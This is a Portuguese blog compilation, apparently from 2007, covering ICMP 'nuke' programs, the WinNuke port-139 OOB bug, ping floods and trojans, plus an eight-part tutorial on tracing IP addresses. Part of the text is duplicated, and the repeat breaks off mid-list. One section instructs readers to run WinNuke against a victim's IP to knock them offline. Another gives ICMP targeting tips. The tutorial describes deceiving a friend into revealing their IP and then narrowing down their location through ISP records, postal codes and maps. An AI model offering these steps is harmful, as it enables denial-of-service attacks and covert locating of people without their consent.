Oq é Nuke!
--------------------------------------------------------------------------------
o que é nuke?
nuke é o nome atribuído a programas que finalizam prematuramente com uma conexão tcp através do envio de pacotes icmp com mensagens de erro. tais pacotes podem ser direcionadas para o servidor (server side nuke) ou para o cliente (client side nuke). tais programas tem a propriedade de terminar com a conexão fazendo com que o cliente ou o servidor sejam enganados por uma mensagem de erro que normalmente indicaria um problema de conexão entre os dois. o efeito de tal programa para a vitima e' a desconexão do seu servidor, geralmente sem efeitos colaterais. num exemplo pratico seria como se você fosse desconectado do servidor irc.
história --- acredito que o primeiro programa de nuke foi o nuke.c, para unix, seu autor se chamava satanic mechanic. este programa enviava pacotes icmp com mensagens de erro na porta 23 do servidor, finalizando assim com conexões telnet. com a utilização de firewalls, nukes direcionados para o servidor passaram a não ser mais eficientes. passou-se então a "nukar" o host do cliente, no entanto, o fato do cliente geralmente não possuir uma porta fixa para estabelecer a conexão com o servidor dificulta a operação. a solução para isso foi o desenvolvimento de programas que varrem seqüencialmente todas as portas do cliente aonde pode existir uma conexão (portas de 1024 ate' 65535), bombardeando elas com mensagens de erro até que se encontre a porta aonde se deu a conexão com o servidor. o numero de programas de "nuking" para sistemas unix supera em muito os equivalentes para windows, alem de geralmente serem muito mais eficientes devido as limitações do winsock. alguns programas de nuke desenvolvidos para o winsock 2.2beta já estão sendo lançados, estes sim muito mais poderosos do que seus antecessores para a plataforma microsoft. entre esses posso citar o click4 (by rhad), que realmente (infelizmente) é muito poderoso. um dos primeiros programas de nuke para a plataforma windows (e um dos mais populares) foi o wnuke. É um aplicativo em 16 bits que utiliza recursos do trumpet winsock para enviar os pacotes. foram lançadas diversas versões desse programa, cada uma implementando mais recursos como controle do tipo de mensagem icmp enviada e delay entre o envio dos pacotes, de forma que o programa poderia ser utilizado por pessoas que não dispõe de uma conexão de alta velocidade com a internet .
como utilizar um nuke ? bem... você realmente não deveria utilizar o nuke, essa sessão aqui pretende explicar o funcionamento de um programa de nuke, portanto não vou citar exemplos "práticos" de como nukar, mas sim as definições básicas. basicamente todos os programas de nuke utilizam o mesmo principio: 1 - definir o alvo dos pacotes (cliente ou servidor) 2 - definir o tipo de mensagem de erro enviada (opcional) 3 definir o host do cliente 4 - definir o host do servidor 5 - definir as portas a serem nukadas no cliente 6 - definir as portas a serem nukadas no servidor 7 - definir o intervalo (delay) entre cada pacote enviado (opcional) uma vez determinados esses parâmetros o programa inicia o envio de pacotes de erro. quanto mais rapido foi a sua conexão com a internet menor o intervalo ente cada pacote, e mais rápido a vitima vai ser atingida. no lugar da porta do servidor, o mais obvio é começar a varredura a partir da porta 6667, que é a porta de conexão default para a maioria dos servidor irc. o tipo de mensagem de erro enviada pode ser determinada preferencialmente pelo tipo de alvo. se o alvo for uma maquina unix, mensagens de 'host unreachable' demonstram maior eficiência. no caso de maquina windows, "protocol unreacheble" demonstrou ser mais eficiente.
oob bug (bug da porta 139) diversos programas utilizam esse bug para travar sistemas windows, gerando um "denial of service" através do envio de um pacote oob (out of band) marcado como urgente para portas especificas, como por exemplo a porta 139. sistemas windows nt sem o hotfix oobfix instalado ainda são afetados em duas outras portas, que prefiro não divulgar para impedir o uso mal intencionado dessa informação. apesar de serem chamados de nuke (winnuke, wnuke32, etc...) na verdade esses programas tem um funcionamento totalmente diferente, eles simplesmente se aproveitam de um defeito no sistema. conforme descrito em seções anteriores o funcionamento de programas de nuke é diferente. os efeitos de um ataque de oob são facilmente perceptíveis. todo o sistema de rede do windows entra em pânico, e geralmente é necessária a reinicialização do sistema para que a situação seja normalizada. felizmente já existem diversos patches disponíveis para resolver esse problema, para a plataforma windows nt, sugiro o ftp://198.105.232.37/fixes/, site nativo da própria microsoft aonde estão todos os service packs e hotfixes disponíveis. caso você já tenha aplicado o service pack 3, o diretório aonde esta o hotfix para o bug de oob é: /fixes/usa/nt40/hotfixes-postsp3/oob-fix para o windows 95, existem diversas soluções, a mais simples de todas é um arquivo de registro que simplesmente fecha a porta 139. essa solução não é a oficial da microsoft e na minha opinião deve ser evitada, dando preferencia para o patch disponibilizado em http://www.microsoft.com/kb/articles/q168/7/47.htm
pinga bom inicialmente vale explicar que não estamos falando de ctcp ping, e sim do programa ping (packet internet groper) que verifica se um endereço ip existe e esta respondendo. o uso mal intencionado desse programa, a partir de uma conexão rápida com a rede, faz com que a vitima caia num lag que provavelmente o levara a desconexão por ping timeout, devido a quantidade de pacotes recebidos superar em muito a sua capacidade de devolver os mesmos.
winnuke: um bug no subsistema de rede do windows 3.x, 95 e nt permite que usuários externos possam desativar totalmente o seu acesso à rede, simplesmente enviando informações marcadas como urgentes (out-of-band;oob) a determinadas portas do seu computador (sendo que a mais usual é a 139). esse ataque de denial-of-service desabilita totalmente a comunicação tcp/ip de sua máquina, retornando ao normal apenas após o reboot da sua máquina. existem proteções disponíveis que simplesmente fecham a porta 139 - isso não é eficiente, pois o ataque oob pode ser utado em outras portas menos usuais também. da mesma forma, os detetores de nuke que se destinam a identificar a origem dos ataques oob também não tem eficiência máxima porque limitam - se a ouvir a porta 139. além disso, eles não deveriam se chamar detetores de `nuke`, uma vez que o ataque que eles detectam não constitui um nuke canônico, mas apenas um exploit de um bug do microsoft winsock.
nukando ips: pra nukar um ip, é muito simples, basta fazer o download de algum nuker bom, ou por exemplo o download do wingenocide que simplesmente come memória ram do computador da vítima. não se preocupe pois não vamos ficar falando a parte teórica de como funciona nuke, basta você saber bem por cima de que há uma porta 139 que tem um bug e essa porta que você vai nukar, retirando a pessoa da internet (desconectando-a). se você esta interessado em fazer o download de um programa de nuke sugiro que você pegue um programa chamado winnuke, que já ganhou fama por ser um programa muito bom. usando este programa basta você pegar o ip da vítima, sendo por qualquer modo que ensinamos acima, ou por outro método e colocar este ip no campo indicado no programa, depois se você apertar o botão nuke! e esperar aparecer a mensagem de que o nuke foi enviado.
rastreando o provedor do ip: se você não quer nukar, por qualquer motivo, sendo por ter medo dele ou por não querer mesmo, ou se você quer apenas dar um susto na vítima do ip, esta é uma solução boa, pois com este programa você pode rastrear o provedor do dono do ip. para fazer isto basta você fazer o download de um programa scan. aqui você pode fazer o download do ipscan que é o mais simples dos scans, mas se você preferir vá até nossa seção de download copie o cyberkit ou outro qualquer. usando o ipscan, tudo que você tem que fazer é colocar o ip da pessoa no campo indicado e apertar start que logo irá aparecer o provedor da pessoa em baixo.
protegendo de nukes: 1. faça o download do patch. ute o programa e extraia no diretório windowssystem 2. feito isso, dê iniciar/utar. lá coloque: c:windowssystempatch.bat 3. uma tela do prompt do dos vai aparecer. o programa vai renomear o arquivo. aí é só reiniciar o computador e você nunca mais será nukado! obs.: se você possuir uma rede em casa, nÃo use este patch! o arquivo que será renomeado (vnbt.386) é necessário para a rede!
terça-feira, 16 de outubro de 2007
Tirar TROIA!
os cavalos de tróia digitais
< cellspacing="0" cellpadding="0" width="100%" border="0">
você conhece aquela história sobre o presente de grego (literalmente), um belo cavalo de madeira, que escondia centenas de soldados prontos para acabar com a paz dos troianos, certo?
na era da informática não mudou muito, a não ser pelo fato de que os cavalos de madeira são feitos agora de bytes. os chamados "programas cavalo-de-tróia" são, aparentemente, programas comuns, muitas vezes conhecidos, algumas vezes novos, mas que semprem fazem algo mais do que anunciam.
seja capturar senhas, causar estragos ou tirar proveito do usuário de alguma forma não documentada. tá complicado? imagina o seguinte: toda vez que você se conecta ao seu provedor, ele uta um programa chamado "login", que lhe pergunta seu nome e sua senha. imagina se alguém faz um programa muito parecido com o "login" mas que, ao invés de lhe conectar no provedor, ele faz uma cópia da sua senha em um arquivo escondido, onde apenas o autor do programa ado sabe o local. em alguns dias ele resgata este arquivo e terá nas mãos a senha de quase todos os usuários do seu provedor.
algumas pessoas têm confundido cavalos de tróia com backdoors. os conceitos são parecidos, mas existem diferenças fundamentais. por exemplo: o back orifice e o netbus são cavalos de tróia, pois não possuem nenhuma finalidade prática para a vítima. já o ickiller, que derruba usuários do icq possui uma backdoor, pois há uma porta dos fundos que permite certas invasões.
< cellspacing="0" cellpadding="0" width="100%" border="0">
você conhece aquela história sobre o presente de grego (literalmente), um belo cavalo de madeira, que escondia centenas de soldados prontos para acabar com a paz dos troianos, certo?
na era da informática não mudou muito, a não ser pelo fato de que os cavalos de madeira são feitos agora de bytes. os chamados "programas cavalo-de-tróia" são, aparentemente, programas comuns, muitas vezes conhecidos, algumas vezes novos, mas que semprem fazem algo mais do que anunciam.
seja capturar senhas, causar estragos ou tirar proveito do usuário de alguma forma não documentada. tá complicado? imagina o seguinte: toda vez que você se conecta ao seu provedor, ele uta um programa chamado "login", que lhe pergunta seu nome e sua senha. imagina se alguém faz um programa muito parecido com o "login" mas que, ao invés de lhe conectar no provedor, ele faz uma cópia da sua senha em um arquivo escondido, onde apenas o autor do programa ado sabe o local. em alguns dias ele resgata este arquivo e terá nas mãos a senha de quase todos os usuários do seu provedor.
algumas pessoas têm confundido cavalos de tróia com backdoors. os conceitos são parecidos, mas existem diferenças fundamentais. por exemplo: o back orifice e o netbus são cavalos de tróia, pois não possuem nenhuma finalidade prática para a vítima. já o ickiller, que derruba usuários do icq possui uma backdoor, pois há uma porta dos fundos que permite certas invasões.
Rastreando IP'S
rastreando ips
rastreando ip (tutorial)
1 parte
bom, issu daí foi uma busca que eu fiz em vários lugares, e montei um tutorial so bem explicado, pra quem ta começando isso vai ajudar bastante...se alguém quiser copiar esse tutorial botem so os devidos créditos...e é isso ai....
pra começa hacker num é so invadi pc de outro, invadi msn, orkut e etc...hacker é conhecimento acima de tdu...se tem ke ter cabeça, num adianta xega aqui e olha os tutoriais de invadi pc de outro, pq no final o pc é fudido é o seu
entao primeiro de tdu vmu sbe o que é ip ne...
o endereço ip, de forma genérica, pode ser considerado como um conjunto de números que representa o local de um determinado equipamento (normalmente computadores) em uma rede privada ou pública.
para um melhor uso dos endereços de equipamentos em rede pelas pessoas, utiliza-se a forma de endereços de domínio, tal como "www.orkut.com". cada endereço de domínio é convertido em um endereço ip pelo dns. este processo de conversão é conhecido como resolução de nomes de domínio.
cada número do ip identifica uma informação sobre o usuários, assim como localidade.
no caso do brasil por padrão, o ip inicia com os números 200 ou 201, mas os outros seqüentes podem mudar conforme o tempo, pois isso evita alguns ataques por hackers ou script kiddies.
ter uma lista com a numeração atualizada indicando cada número pra estado ou cidade é meio difícil, então pra encontrar um salto final é preciso ter certa habilidade
com o assunto e muito esforço pra conseguir dados que elucidam a localidade. 30 set (4 dias atrás) kakashi.ex3
parte 2
rastreando ip (tutorial)
2 parte
como descobrir ip
existem dois jeitos pra vc conseguir o ip de uma pessoa plu msn, se a pessoa for seu amigo e burro ao não entender essas coisas e ele tiver o msn live é so vc pdir pra ele digitar isso na conversação sua com ele
(!ip)
obs: tem ke ta tdu junto e o ip tem que ser maiúsculo...
ai vc pde pra ele apertar enter e vê o numero que sair e te passar, é claro que ele vai perguntar o pq, ai se inventa uma desculpa qualquer...vc pde testar isso na sua conversa e fzer isso, vai aparecer o seu numero de ip, mais nda vai aparecer pra ele...
jeito dois....esse jeito é o mais chato pra min, por issu eu nunca uso ele, mais ele é bom...ele tmb é chamado como a forma ping (para descobrir ip de sites) e forma netstat –n/arp –a (ip de usuários)
entao vou falar tanto do ping, como do netstat –n/ arp –a
o ping envia pacotes icmp para fazer a verificação de disponibilidade do destino final (servidor ou web site).
isso significa que ao "pingar" vc pode saber se o site está no ar e seu ip, caso esteja.
exemplo de como usar o ping!!!
abra seu prompt de comando (ms-dos) ou vá em
iniciar/ utar e digite "cmd" sem aspas, abrirá uma tela (geralmente preta).
digite o comando "ping" sem aspas, dê uma espaço e digite o nome do site.
exemplo:
ping www.orkut.com
ele irá disparar contra o servidor enviando pacotes icmp para verificar disponibilidade. e trará como resposta o ip 216.239.51.85 e outros dados como estatística e tempo em milisegundos do envio de pacotes.
pegar ip do computador de um amigo
no windows xp o comando será: netstat -n
no windows 98 o comando será: arp -a
irei trabalhar apenas com o comando no xp, mas mude caso seu so não seja.
para que vc possa pegar o ip de um amigo, terá que ter conexão direta com ele, ou seja, uma conversa no icq ou msn... 30 set (4 dias atrás) kakashi.ex3
parte 3
rastreando ip (tutorial)
3 parte
no caso do msn, nào basta apenas conversar com ele de forma escrita. deverá abrir uma conversa com webcam ou enviar ou receber um arquivo que tenha pelo menos uns 50kb, para que vc possa ter tempo tb de pegar o ip dele com precisão.
É aconselhável que vc feche todas as janelas de navegação por mais de 5 minutos. depois desse tempo, envie um arquivo ao amigo ou inicie uma conversa de video com ele através da webcam.
no decorrer deste download ou upload de informações, vc deve digitar (no caso do windows xp) o seguinte comando no prompt (ms-dos)
netstat -n
aparecerá vários ip's, mas como por padrão no brasil, o ip de seu amigo será o único que começar com 200 ou 201.
algo do tipo: 201.23.83.7:1863
este :1863 não é ip, é apenas a porta do msn no pc do amigo.
existe tmb mais uma forma das formas fáceis para descobrir o ip do seu amigo
forma hotmail
bom... primeiro vc tem que usar o seu hotmail no modo antigo, não pde ser plo live pq se não não da...
vamos la, configurando o e-mail do hotmail para pegar ip de que lhe envia e-mail.
1-entre na sua caixa de email do "hotmail".
2-clique em "opções"
3-clique em "correio"
4-clique em "configurações de exibição de mensagens"
5-na opção "cabeçalhos de mensagens" deixe marcado a caixa como "avançada"
6-clique em ok
7-quando vc for ler um email, percebe-se que terá algumas novas opções embaixo da palavra "assunto", o ip da pessoa que te mandou o email estará na opção "x-originating-ip:"
pronto! seu email está configurado e pronto para pegar ips de quem lhe enviar os e-mails.
bom kom o ip nas mãos... vmus descobri de onde a pessoa ta flando ne...essa pra min é a parte mais legal...entao vmus la... 30 set (4 dias atrás) kakashi.ex3
parte 4
rastreando ip (tutorial)
4 parte
com o ip em mãos, vc precisa agora saber o route que ele passou, e saber quantos saltos e quais foram até chegar em seu pc.
então com o prompt de comando (ms-dos) aberto, vc irá digitar o comando tracert com o ip que vc pegou anteriormente. seja de um amigo ou de um site.
exemplo:
tracert 216.239.51.85
seu tracerout estará disparando contra contra o www.orkut.com neste caso que postei acima, mas use o ip que desejar.
ao final dos saltos que irá ocorrer, aparecerá uma lista com dados de provedores e outros que sua conexão passa até chegar ao destino final. vale lembrar que se este destino final fizer contra vc, aparecerá provavelmente a mesma lista de saltos, mas ao contrário.
exemplificando o entendimento desses dados, se aparecer algo como telesp ao final dos saltos, vc saberá que provavelmente este sinal seja de são paulo (estado), e assim por diante.
ao final aparecerá rastreamento completo, e basta apenas vc entender o que cada salto significa e como tirar aproveito disso pra ter maiores informações.
supondo que vc saiba em que localidade do brasil ou outro país se encontra o último salto, é possível achar a cidade de onde vem este sinal. (último salto na conexão de um amigo geralmente vem de seu provedor de acesso, mas isso pode variar muito)... 30 set (4 dias atrás) kakashi.ex3
parte 5
rastreando ip (tutorial)
5 parte
um jeito mais fácil... é esse pelo site, entao vmus la...
agora entendendo um pouco de como os sistemas de buscas relacionam ceps com ips:
bom tudo começa das estruturas físicas da rede, físico me refiro a fios, postes, caixas telefônicas, localização do provedor, etc. quando você recebe um ip, seu provedor gera ele apartir do seu cep(não é bem um cálculo com seu cep e sim questão de proximidades).
explico: supomos que você recebeu o ip 200.196.196.5 e seu vizinho recebeu 200.150.30.2, sendo que ele mora no mesmo cep que vc,
o que aconteceria é que o ping(tempo para recebimento de pacotes) demoraria(suposição) uns 150ms(isso é lento, sim eu amo parenteses :lol.
o que na realidade deveria ser uns 70ms mais ou menos.
então o provedor lhe atribui ips conforme seu cep, sendo assim seu vizinho provavelmente receberá um ip semelhante ao seu, pelo menos na teoria seria assim, ao menos que se escasse os ips semelhantes, mas aí é outro papo.
entendido isso de cep x ip, vamos a forma de rastreá-los.
______________________________
há um projeto nacional chamado ipgeo mantido pelo portal rankbrasil, que mantêm um banco de dados com uma relação imensa de ips -> ceps. bom ao certo de onde eles colhem essas informações eu não sei, suponho que seja algo vinculado aos provedores e ao registro.br.
então vamos lá, acesse o site: http://www.ipgeo.com.br
e informe o ip que deseja consultar, como exemplo vou usar esse : ip 200.203.3.62
o que vai acontecer, o sistema irá sempre mostrar uma série de resultados, pois são os ips mais semelhantes ao seu, caso encontre
exatamente o ip informado, ele irá ser mostrado no topo da lista.
resultado obtido:
citar
proximidades de ip com ceps confirmados
200.203.3.62 95020180 caxias do sul rs
200.203.3.63 95180000 farroupilha rs
200.203.3.63 95700000 bento gonçalves rs
200.203.3.64 95020320 caxias do sul rs
200.203.3.64 95020460 caxias do sul rs
200.203.3.64 95097000 caxias do sul rs
200.203.3.65 95010100 caxias do sul rs 30 set (4 dias atrás) kakashi.ex3
parte 6
rastreando ip (tutorial)
6 parte
ainda em buscas no brasil temos outro recurso que é o registro.br(www.registro.br).
já essa nativa é mais adequada de quando estamos consultando ips(fixos) de servidores, os quais estão registrados um dominío, um ip fixo empresarial, etc.
caso consultar um ip dinâmico qualquer, provavelmente os resultados serão os dados do companhia de telecomunicações da região, como brasil telecom.
exemplo, consultei pelo meu ip:
citar
...
inetnum: 200.203.0/17
asn: as8167
id abusos: bta17
entidade: brasil telecom s/a - filial distrito federal
documento: 076.535.764/0326-90
responsável: brasil telecom s. a. - cnrs
endereço: seps 702/092 cj. b - bl b 3 andar gen. alencastro, s/n,
endereço: 70390-025 - brasilia - df
telefone: (61) 415-4201 []
id entidade: btc14
id técnico: btc14
inetrev: 200.203.0/24
servidor dns: ns3.brasiltelecom.net.br
...
agora outra consulta, mas pelo ip 200.176.3.142
citar
...
inetnum: 200.176/16
asn: as11706
id abusos: abt82
entidade: terra networks brasil s.a.
documento: 091.088.328/0003-29
responsável: hostmaster terra networks
endereço: joão manoel, 90,
endereço: 90010-030 - porto alegre - rs
telefone: (51) 32844000 []
id entidade: mpl4
id técnico: mpl4
inetrev: 200.176.0/18
servidor dns: ns1.terra.com.br
...
como deu pra notar, é o ip do terra.com.br, então essa é a diferença de um ip registrado. 30 set (4 dias atrás) kakashi.ex3
parte 7
rastreando ip (tutorial)
7 parte
mas e no caso de um ip que não seja do brasil ?
bom aí se fizermos pelo método anterior não teremos resultados precisos. para isso há outro site americano, maxmind
que disponibiliza recursos semelhantes ao ipgeo.
acesse: http://www.maxmind.com/app/lookup_city
e a teoria é a mesma, porém como é outro país o sistema de caixa postal (cep) será diferente.
então como saber onde procurar, aqui: http://www.embassyworld.com/data/zip_codes.html
há uma listagem de serviços e sites que buscam códigos postais de diversos países.
vamos a um exemplo na prática!
nosso ip de exemplo será: 69.18.1.201
- consultando a localização www.maxmind.com/app/lookup_city
http://i3.tinypic.com/xni8e8.png
descobrimos que o ip é de um provedor de internet.
ou seja, um usuário comum.
- seguimos direto para o google maps e informamos os dados da cidade:
- nesse caso o melhor modo de visualização é map;
- como essa cidade fairfield parece ser o lugar onde o diabo perdeu as meias, o zoom no mapa é bem limitado:
http://i1.tinypic.com/xni8o7.png
- então vamos tentar no mapquest(www.mapquest.com) e informamos o código postal: 52556
bom, um pouco mais detalhado...
http://i3.tinypic.com/xni92b.png
com isso as informações que temos, consiguimos chegar até este ponto, não obtivemos o endereço específico, mas uma noção boa da localização.
bom, então o passo-a-passo que eu sugestionaria para iniciar um rastreamento seria os seguinte:
- analise o ip e descubra qual seu país;
http://www.maxmind.com/app/lookup 30 set (4 dias atrás) kakashi.ex3
parte 8
rastreando ip (tutorial)
8 parte
8 parte
- sabendo a nacionalidade:
* se for nacional:
1) consulte no www.registro.br
2) se constatar que o ip não está registrado, pesquise novamente em http://www.ipgeo.com.br
3) tendo o cep em mãos, consulte ele http://www.correios.com.br/servicos/cep/cep_cep.cfm
* caso seja internacional:
1) busque primeiro no whois: http://whois.lacnic.net
2) senão retornar nada útil tente em: http://www.maxmind.com/app/lookup_city
3) descoberto o país, consulte em http://www.embassyworld.com/data/zip_codes.html
4) acesse algum dos sites da lista referente ao país do ip
5) busque pelo código postal localizado
6) caso seja americano, uma boa dica é procurar no google maps
bomm é essu ae...
rastreando ip (tutorial)
1 parte
bom, issu daí foi uma busca que eu fiz em vários lugares, e montei um tutorial so bem explicado, pra quem ta começando isso vai ajudar bastante...se alguém quiser copiar esse tutorial botem so os devidos créditos...e é isso ai....
pra começa hacker num é so invadi pc de outro, invadi msn, orkut e etc...hacker é conhecimento acima de tdu...se tem ke ter cabeça, num adianta xega aqui e olha os tutoriais de invadi pc de outro, pq no final o pc é fudido é o seu
entao primeiro de tdu vmu sbe o que é ip ne...
o endereço ip, de forma genérica, pode ser considerado como um conjunto de números que representa o local de um determinado equipamento (normalmente computadores) em uma rede privada ou pública.
para um melhor uso dos endereços de equipamentos em rede pelas pessoas, utiliza-se a forma de endereços de domínio, tal como "www.orkut.com". cada endereço de domínio é convertido em um endereço ip pelo dns. este processo de conversão é conhecido como resolução de nomes de domínio.
cada número do ip identifica uma informação sobre o usuários, assim como localidade.
no caso do brasil por padrão, o ip inicia com os números 200 ou 201, mas os outros seqüentes podem mudar conforme o tempo, pois isso evita alguns ataques por hackers ou script kiddies.
ter uma lista com a numeração atualizada indicando cada número pra estado ou cidade é meio difícil, então pra encontrar um salto final é preciso ter certa habilidade
com o assunto e muito esforço pra conseguir dados que elucidam a localidade. 30 set (4 dias atrás) kakashi.ex3
parte 2
rastreando ip (tutorial)
2 parte
como descobrir ip
existem dois jeitos pra vc conseguir o ip de uma pessoa plu msn, se a pessoa for seu amigo e burro ao não entender essas coisas e ele tiver o msn live é so vc pdir pra ele digitar isso na conversação sua com ele
(!ip)
obs: tem ke ta tdu junto e o ip tem que ser maiúsculo...
ai vc pde pra ele apertar enter e vê o numero que sair e te passar, é claro que ele vai perguntar o pq, ai se inventa uma desculpa qualquer...vc pde testar isso na sua conversa e fzer isso, vai aparecer o seu numero de ip, mais nda vai aparecer pra ele...
jeito dois....esse jeito é o mais chato pra min, por issu eu nunca uso ele, mais ele é bom...ele tmb é chamado como a forma ping (para descobrir ip de sites) e forma netstat –n/arp –a (ip de usuários)
entao vou falar tanto do ping, como do netstat –n/ arp –a
o ping envia pacotes icmp para fazer a verificação de disponibilidade do destino final (servidor ou web site).
isso significa que ao "pingar" vc pode saber se o site está no ar e seu ip, caso esteja.
exemplo de como usar o ping!!!
abra seu prompt de comando (ms-dos) ou vá em
iniciar/ utar e digite "cmd" sem aspas, abrirá uma tela (geralmente preta).
digite o comando "ping" sem aspas, dê uma espaço e digite o nome do site.
exemplo:
ping www.orkut.com
ele irá disparar contra o servidor enviando pacotes icmp para verificar disponibilidade. e trará como resposta o ip 216.239.51.85 e outros dados como estatística e tempo em milisegundos do envio de pacotes.
pegar ip do computador de um amigo
no windows xp o comando será: netstat -n
no windows 98 o comando será: arp -a
irei trabalhar apenas com o comando no xp, mas mude caso seu so não seja.
para que vc possa pegar o ip de um amigo, terá que ter conexão direta com ele, ou seja, uma conversa no icq ou msn... 30 set (4 dias atrás) kakashi.ex3
parte 3
rastreando ip (tutorial)
3 parte
no caso do msn, nào basta apenas conversar com ele de forma escrita. deverá abrir uma conversa com webcam ou enviar ou receber um arquivo que tenha pelo menos uns 50kb, para que vc possa ter tempo tb de pegar o ip dele com precisão.
É aconselhável que vc feche todas as janelas de navegação por mais de 5 minutos. depois desse tempo, envie um arquivo ao amigo ou inicie uma conversa de video com ele através da webcam.
no decorrer deste download ou upload de informações, vc deve digitar (no caso do windows xp) o seguinte comando no prompt (ms-dos)
netstat -n
aparecerá vários ip's, mas como por padrão no brasil, o ip de seu amigo será o único que começar com 200 ou 201.
algo do tipo: 201.23.83.7:1863
este :1863 não é ip, é apenas a porta do msn no pc do amigo.
existe tmb mais uma forma das formas fáceis para descobrir o ip do seu amigo
forma hotmail
bom... primeiro vc tem que usar o seu hotmail no modo antigo, não pde ser plo live pq se não não da...
vamos la, configurando o e-mail do hotmail para pegar ip de que lhe envia e-mail.
1-entre na sua caixa de email do "hotmail".
2-clique em "opções"
3-clique em "correio"
4-clique em "configurações de exibição de mensagens"
5-na opção "cabeçalhos de mensagens" deixe marcado a caixa como "avançada"
6-clique em ok
7-quando vc for ler um email, percebe-se que terá algumas novas opções embaixo da palavra "assunto", o ip da pessoa que te mandou o email estará na opção "x-originating-ip:"
pronto! seu email está configurado e pronto para pegar ips de quem lhe enviar os e-mails.
bom kom o ip nas mãos... vmus descobri de onde a pessoa ta flando ne...essa pra min é a parte mais legal...entao vmus la... 30 set (4 dias atrás) kakashi.ex3
parte 4
rastreando ip (tutorial)
4 parte
com o ip em mãos, vc precisa agora saber o route que ele passou, e saber quantos saltos e quais foram até chegar em seu pc.
então com o prompt de comando (ms-dos) aberto, vc irá digitar o comando tracert com o ip que vc pegou anteriormente. seja de um amigo ou de um site.
exemplo:
tracert 216.239.51.85
seu tracerout estará disparando contra contra o www.orkut.com neste caso que postei acima, mas use o ip que desejar.
ao final dos saltos que irá ocorrer, aparecerá uma lista com dados de provedores e outros que sua conexão passa até chegar ao destino final. vale lembrar que se este destino final fizer contra vc, aparecerá provavelmente a mesma lista de saltos, mas ao contrário.
exemplificando o entendimento desses dados, se aparecer algo como telesp ao final dos saltos, vc saberá que provavelmente este sinal seja de são paulo (estado), e assim por diante.
ao final aparecerá rastreamento completo, e basta apenas vc entender o que cada salto significa e como tirar aproveito disso pra ter maiores informações.
supondo que vc saiba em que localidade do brasil ou outro país se encontra o último salto, é possível achar a cidade de onde vem este sinal. (último salto na conexão de um amigo geralmente vem de seu provedor de acesso, mas isso pode variar muito)... 30 set (4 dias atrás) kakashi.ex3
parte 5
rastreando ip (tutorial)
5 parte
um jeito mais fácil... é esse pelo site, entao vmus la...
agora entendendo um pouco de como os sistemas de buscas relacionam ceps com ips:
bom tudo começa das estruturas físicas da rede, físico me refiro a fios, postes, caixas telefônicas, localização do provedor, etc. quando você recebe um ip, seu provedor gera ele apartir do seu cep(não é bem um cálculo com seu cep e sim questão de proximidades).
explico: supomos que você recebeu o ip 200.196.196.5 e seu vizinho recebeu 200.150.30.2, sendo que ele mora no mesmo cep que vc,
o que aconteceria é que o ping(tempo para recebimento de pacotes) demoraria(suposição) uns 150ms(isso é lento, sim eu amo parenteses :lol.
o que na realidade deveria ser uns 70ms mais ou menos.
então o provedor lhe atribui ips conforme seu cep, sendo assim seu vizinho provavelmente receberá um ip semelhante ao seu, pelo menos na teoria seria assim, ao menos que se escasse os ips semelhantes, mas aí é outro papo.
entendido isso de cep x ip, vamos a forma de rastreá-los.
______________________________
há um projeto nacional chamado ipgeo mantido pelo portal rankbrasil, que mantêm um banco de dados com uma relação imensa de ips -> ceps. bom ao certo de onde eles colhem essas informações eu não sei, suponho que seja algo vinculado aos provedores e ao registro.br.
então vamos lá, acesse o site: http://www.ipgeo.com.br
e informe o ip que deseja consultar, como exemplo vou usar esse : ip 200.203.3.62
o que vai acontecer, o sistema irá sempre mostrar uma série de resultados, pois são os ips mais semelhantes ao seu, caso encontre
exatamente o ip informado, ele irá ser mostrado no topo da lista.
resultado obtido:
citar
proximidades de ip com ceps confirmados
200.203.3.62 95020180 caxias do sul rs
200.203.3.63 95180000 farroupilha rs
200.203.3.63 95700000 bento gonçalves rs
200.203.3.64 95020320 caxias do sul rs
200.203.3.64 95020460 caxias do sul rs
200.203.3.64 95097000 caxias do sul rs
200.203.3.65 95010100 caxias do sul rs 30 set (4 dias atrás) kakashi.ex3
parte 6
rastreando ip (tutorial)
6 parte
ainda em buscas no brasil temos outro recurso que é o registro.br(www.registro.br).
já essa nativa é mais adequada de quando estamos consultando ips(fixos) de servidores, os quais estão registrados um dominío, um ip fixo empresarial, etc.
caso consultar um ip dinâmico qualquer, provavelmente os resultados serão os dados do companhia de telecomunicações da região, como brasil telecom.
exemplo, consultei pelo meu ip:
citar
...
inetnum: 200.203.0/17
asn: as8167
id abusos: bta17
entidade: brasil telecom s/a - filial distrito federal
documento: 076.535.764/0326-90
responsável: brasil telecom s. a. - cnrs
endereço: seps 702/092 cj. b - bl b 3 andar gen. alencastro, s/n,
endereço: 70390-025 - brasilia - df
telefone: (61) 415-4201 []
id entidade: btc14
id técnico: btc14
inetrev: 200.203.0/24
servidor dns: ns3.brasiltelecom.net.br
...
agora outra consulta, mas pelo ip 200.176.3.142
citar
...
inetnum: 200.176/16
asn: as11706
id abusos: abt82
entidade: terra networks brasil s.a.
documento: 091.088.328/0003-29
responsável: hostmaster terra networks
endereço: joão manoel, 90,
endereço: 90010-030 - porto alegre - rs
telefone: (51) 32844000 []
id entidade: mpl4
id técnico: mpl4
inetrev: 200.176.0/18
servidor dns: ns1.terra.com.br
...
como deu pra notar, é o ip do terra.com.br, então essa é a diferença de um ip registrado. 30 set (4 dias atrás) kakashi.ex3
parte 7
rastreando ip (tutorial)
7 parte
mas e no caso de um ip que não seja do brasil ?
bom aí se fizermos pelo método anterior não teremos resultados precisos. para isso há outro site americano, maxmind
que disponibiliza recursos semelhantes ao ipgeo.
acesse: http://www.maxmind.com/app/lookup_city
e a teoria é a mesma, porém como é outro país o sistema de caixa postal (cep) será diferente.
então como saber onde procurar, aqui: http://www.embassyworld.com/data/zip_codes.html
há uma listagem de serviços e sites que buscam códigos postais de diversos países.
vamos a um exemplo na prática!
nosso ip de exemplo será: 69.18.1.201
- consultando a localização www.maxmind.com/app/lookup_city
http://i3.tinypic.com/xni8e8.png
descobrimos que o ip é de um provedor de internet.
ou seja, um usuário comum.
- seguimos direto para o google maps e informamos os dados da cidade:
- nesse caso o melhor modo de visualização é map;
- como essa cidade fairfield parece ser o lugar onde o diabo perdeu as meias, o zoom no mapa é bem limitado:
http://i1.tinypic.com/xni8o7.png
- então vamos tentar no mapquest(www.mapquest.com) e informamos o código postal: 52556
bom, um pouco mais detalhado...
http://i3.tinypic.com/xni92b.png
com isso as informações que temos, consiguimos chegar até este ponto, não obtivemos o endereço específico, mas uma noção boa da localização.
bom, então o passo-a-passo que eu sugestionaria para iniciar um rastreamento seria os seguinte:
- analise o ip e descubra qual seu país;
